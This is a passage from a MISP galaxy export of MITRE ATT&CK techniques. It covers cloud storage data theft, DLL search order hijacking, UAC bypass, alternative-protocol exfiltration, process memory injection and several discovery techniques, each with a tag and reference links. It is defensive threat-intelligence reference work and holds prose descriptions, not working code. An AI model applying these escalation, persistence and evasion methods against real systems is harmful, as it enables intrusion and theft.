This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021)

Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.

The tag is: misp-galaxy:mitre-attack-pattern="Data from Cloud Storage - T1530"

Table 5533. Table References

Links

https://attack.mitre.org/techniques/T1530

https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/

https://cloud.google.com/storage/docs/best-practices

https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide

https://redcanary.com/blog/rclone-mega-extortion/

https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/

https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia

https://www.wired.com/story/magecart-amazon-cloud-hacks/

Indicator Removal on Host - T1630

Adversaries may delete, alter, or hide generated artifacts on a device, including files, jailbreak status, or the malicious application itself. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of mobile security solutions by causing notable events or information to go unreported.

The tag is: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1630"

Table 5534. Table References

Links

https://attack.mitre.org/techniques/T1630

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-43.html

File and Directory Discovery - T1083

Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Many command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. <code>dir</code>, <code>show flash</code>, and/or <code>nvram</code>).(Citation: US-CERT-TA18-106A)

The tag is: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"

Table 5535. Table References

Links

https://attack.mitre.org/techniques/T1083

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://www.us-cert.gov/ncas/alerts/TA18-106A

DLL Search Order Hijacking - T1038

Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence.

Adversaries may perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft 2269637) Adversaries may use this behavior to cause the program to load a malicious DLL.

Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation. (Citation: Microsoft DLL Redirection) (Citation: Microsoft Manifests) (Citation: Mandiant Search Order)

If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.

Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.

The tag is: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1038"

Table 5536. Table References

Links

http://msdn.microsoft.com/en-US/library/ms682586

http://msdn.microsoft.com/en-US/library/ms682600

https://attack.mitre.org/techniques/T1038

https://capec.mitre.org/data/definitions/471.html

https://msdn.microsoft.com/en-US/library/aa375365

https://msrc-blog.microsoft.com/2010/08/21/microsoft-security-advisory-2269637-released/

https://www.mandiant.com/blog/dll-search-order-hijacking-revisited/

https://www.owasp.org/index.php/Binary_planting

Deploy exploit using advertising - T1380

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Exploits spread through advertising (malvertising) involve injecting malicious or malware-laden advertisements into legitimate online advertising networks and webpages. (Citation: TPMalvertising)

The tag is: misp-galaxy:mitre-attack-pattern="Deploy exploit using advertising - T1380"

Table 5537. Table References

Links

https://attack.mitre.org/techniques/T1380

Detect App Analysis Environment - T1440

An adversary could evade app vetting techniques by placing code in a malicious application to detect whether it is running in an app analysis environment and, if so, avoid performing malicious actions while under analysis.

Discussion of general Android anti-analysis techniques can be found in (Citation: Petsas). Discussion of Google Play Store-specific anti-analysis techniques can be found in (Citation: Oberheide-Bouncer), (Citation: Percoco-Bouncer).

(Citation: Wang) presents a discussion of iOS anti-analysis techniques.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Detect App Analysis Environment - T1440"

Detect App Analysis Environment - T1440 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"

Table 5538. Table References

Links

https://attack.mitre.org/techniques/T1440

Exploitation for Privilege Escalation - T1404

Adversaries may exploit software vulnerabilities in order to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in an application, service, within the operating system software, or kernel itself to execute adversary-controlled code. Security constructions, such as permission levels, will often hinder access to information and use of certain techniques. Adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.

When initially gaining access to a device, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and applications running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user- level permission to root permissions depending on the component that is vulnerable.

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1404"

Table 5539. Table References

Links

https://attack.mitre.org/techniques/T1404

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-26.html

File System Permissions Weakness - T1044

Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.

Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.

Services

Manipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate service executable with their own executable to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is started, either directly by the user (if appropriate access is available) or through some other means, such as a system restart if the service starts on bootup, the replaced executable will run instead of the original service executable.

Executable Installers

Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the <code>%TEMP%</code> directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088). Several examples of this weakness in existing common installers have been reported to software vendors. (Citation: Mozilla Firefox Installer DLL Hijack) (Citation: Seclists Kanthak 7zip Installer)

The tag is: misp-galaxy:mitre-attack-pattern="File System Permissions Weakness - T1044"

Table 5540. Table References

Links

http://seclists.org/fulldisclosure/2015/Dec/34

https://attack.mitre.org/techniques/T1044

https://capec.mitre.org/data/definitions/17.html

https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/

Obfuscated Files or Information - T1406

Adversaries may attempt to make a payload or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the device or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.

Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Portions of files can also be encoded to hide the plaintext strings that would otherwise help defenders with discovery. Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.(Citation: Microsoft MalLockerB)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406"

Table 5541. Table References

Links

https://attack.mitre.org/techniques/T1406

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.html

https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/

Obtain Device Cloud Backups - T1470

An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud backup services (e.g. Google’s Android backup service or Apple’s iCloud) could use that access to obtain sensitive data stored in device backups. For example, the Elcomsoft Phone Breaker product advertises the ability to retrieve iOS backup data from Apple’s iCloud (Citation: Elcomsoft-EPPB). Elcomsoft also describes (Citation: Elcomsoft-WhatsApp) obtaining WhatsApp communication histories from backups stored in iCloud.

The tag is: misp-galaxy:mitre-attack-pattern="Obtain Device Cloud Backups - T1470"

Table 5542. Table References

Links

https://attack.mitre.org/techniques/T1470

https://blog.elcomsoft.com/2017/07/extract-and-decrypt-whatsapp-backups-from-icloud/

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-0.html

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-1.html

https://www.elcomsoft.com/eppb.html

Exfiltration Over Alternative Protocol - T1048

Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels.

[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux <code>curl</code> may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques)

Many IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://attack.mitre.org/techniques/T1059/009).

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048"

Table 5543. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1048

https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/

System Network Connections Discovery - T1049

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary’s goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.

Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. <code>show ip sockets</code>, <code>show tcp brief</code>).(Citation: US-CERT-TA18-106A)

The tag is: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049"

Table 5544. Table References

Links

https://attack.mitre.org/techniques/T1049

https://cloud.google.com/vpc/docs/vpc

https://docs.aws.amazon.com/vpc/latest/userguide/what-is-amazon-vpc.html

https://docs.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview

https://www.us-cert.gov/ncas/alerts/TA18-106A

Use Alternate Authentication Material - T1550

Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.

Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)

Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.

The tag is: misp-galaxy:mitre-attack-pattern="Use Alternate Authentication Material - T1550"

Table 5545. Table References

Links

https://attack.mitre.org/techniques/T1550

https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication

https://csrc.nist.gov/glossary/term/authentication

https://technet.microsoft.com/en-us/library/dn487457.aspx

Service Registry Permissions Weakness - T1058

Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service’s Registry keys can be manipulated to modify a service’s execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1086), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: MSDN Registry Key Security)

If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).

Adversaries may also alter Registry keys associated with service failure parameters (such as <code>FailureCommand</code>) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: TrustedSignal Service Failure)(Citation: Twitter Service Recovery Nov 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Service Registry Permissions Weakness - T1058"

Table 5546. Table References

Links

https://attack.mitre.org/techniques/T1058

https://capec.mitre.org/data/definitions/478.html

https://msdn.microsoft.com/library/windows/desktop/ms724878.aspx

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html

https://twitter.com/r0wdy_/status/936365549553991680

Command and Scripting Interpreter - T1059

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).

There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).

Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)

The tag is: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059"

Table 5547. Table References

Links

https://attack.mitre.org/techniques/T1059

https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1

https://tools.cisco.com/security/center/resources/integrity_assurance.html#23

https://www.thepythoncode.com/article/executing-bash-commands-remotely-in-python

Gather Victim Network Information - T1590

Adversaries may gather information about the victim’s networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Gather Victim Network Information - T1590"

Table 5548. Table References

Links

https://attack.mitre.org/techniques/T1590

https://dnsdumpster.com/

https://www.circl.lu/services/passive-dns/

https://www.whois.net/

Indicator Removal from Tools - T1066

If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the indicator), modify the tool by removing the indicator, and use the updated version that is no longer detected by the target’s defensive systems or subsequent targets that may use similar systems.

A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may use [Software Packing](https://attack.mitre.org/techniques/T1045) or otherwise modify the file so it has a different signature, and then re-use the malware.

The tag is: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1066"

Table 5549. Table References

Links

https://attack.mitre.org/techniques/T1066

Exploitation for Privilege Escalation - T1068

Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.

When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.

Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068"

Table 5550. Table References

Links

https://attack.mitre.org/techniques/T1068

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules

https://unit42.paloaltonetworks.com/acidbox-rare-malware/

https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf

Bypass User Account Control - T1088

Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)

If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.

Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:

  • <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)

Another bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)

The tag is: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1088"

Table 5551. Table References

Links

http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass

http://www.pretentiousname.com/misc/win7_uac_whitelist2.html

https://attack.mitre.org/techniques/T1088

https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware

https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/

https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/

https://github.com/hfiref0x/UACME

https://msdn.microsoft.com/en-us/library/ms679687.aspx

https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx

https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works

Exploitation for Defense Evasion - T1211

Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.

Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.

There have also been examples of vulnerabilities in public cloud infrastructure of SaaS applications that may bypass defense boundaries (Citation: Salesforce zero-day in facebook phishing attack), evade security logs (Citation: Bypassing CloudTrail in AWS Service Catalog), or deploy hidden infrastructure.(Citation: GhostToken GCP flaw)

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211"

Table 5552. Table References

Links

https://attack.mitre.org/techniques/T1211

https://securitylabs.datadoghq.com/articles/bypass-cloudtrail-aws-service-catalog-and-other/

https://www.bleepingcomputer.com/news/security/ghosttoken-gcp-flaw-let-attackers-backdoor-google-accounts/

https://www.bleepingcomputer.com/news/security/hackers-exploited-salesforce-zero-day-in-facebook-phishing-attack/

Extra Window Memory Injection - T1181

Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data). (Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of extra window memory (EWM) to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)

Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.

Execution granted through EWM injection may take place in the address space of a separate live process. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this may allow access to both the target process’s memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread. (Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)

The tag is: misp-galaxy:mitre-attack-pattern="Extra Window Memory Injection - T1181"

Table 5553. Table References

Links

https://attack.mitre.org/techniques/T1181

https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx

https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx

https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx

https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html

https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/

Exploitation for Credential Access - T1212

Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.

Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain authenticated access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Another example of this is replay attacks, in which the adversary intercepts data packets sent between parties and then later replays these packets. If services don’t properly validate authentication requests, these replayed packets may allow an adversary to impersonate one of the parties and gain unauthorized access or privileges.(Citation: Bugcrowd Replay Attack)(Citation: Comparitech Replay Attack)(Citation: Microsoft Midnight Blizzard Replay Attack)

Such exploitation has been demonstrated in cloud environments as well. For example, adversaries have exploited vulnerabilities in public cloud infrastructure that allowed for unintended authentication token creation and renewal.(Citation: Storm-0558 techniques for unauthorized email access)

Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation for Credential Access - T1212"

Table 5554. Table References

Links

https://adsecurity.org/?p=1515

https://attack.mitre.org/techniques/T1212

https://technet.microsoft.com/en-us/library/security/ms14-068.aspx

https://twitter.com/MsftSecIntel/status/1671579359994343425

https://www.bugcrowd.com/glossary/replay-attack/

https://www.comparitech.com/blog/information-security/what-is-a-replay-attack/

https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/

Component Object Model Hijacking - T1122

The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary’s code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.

The tag is: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1122"

Table 5555. Table References

Links

https://attack.mitre.org/techniques/T1122

https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence

https://msdn.microsoft.com/library/ms694363.aspx

https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com

Data from Information Repositories - T1213

Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization.

The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:

  • Policies, procedures, and standards

  • Physical / logical network diagrams

  • System architecture diagrams

  • Technical system documentation

  • Testing / development credentials

  • Work / project schedules

  • Source code snippets

  • Links to network shares and other internal resources

Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.

The tag is: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213"

Table 5556. Table References

Links

https://attack.mitre.org/techniques/T1213

https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html

https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events

https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2

System Network Connections Discovery - T1421

Adversaries may attempt to get a listing of network connections to or from the compromised device they are currently accessing or from remote systems by querying for information over the network.

This is typically accomplished by utilizing device APIs to collect information about nearby networks, such as Wi-Fi, Bluetooth, and cellular tower connections. On Android, this can be done by querying the respective APIs:

  • WifiInfo for information about the current Wi-Fi connection, as well as nearby Wi-Fi networks. Querying the WiFiInfo API requires the application to hold the ACCESS_FINE_LOCATION permission.

  • BluetoothAdapter for information about Bluetooth devices, which also requires the application to hold several permissions granted by the user at runtime.

  • For Android versions prior to Q, applications can use the TelephonyManager.getNeighboringCellInfo() method. For Q and later, applications can use the TelephonyManager.getAllCellInfo() method. Both methods require the application hold the ACCESS_FINE_LOCATION permission.

The tag is: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1421"

Table 5557. Table References

Links

https://attack.mitre.org/techniques/T1421

Kernel Modules and Extensions - T1215

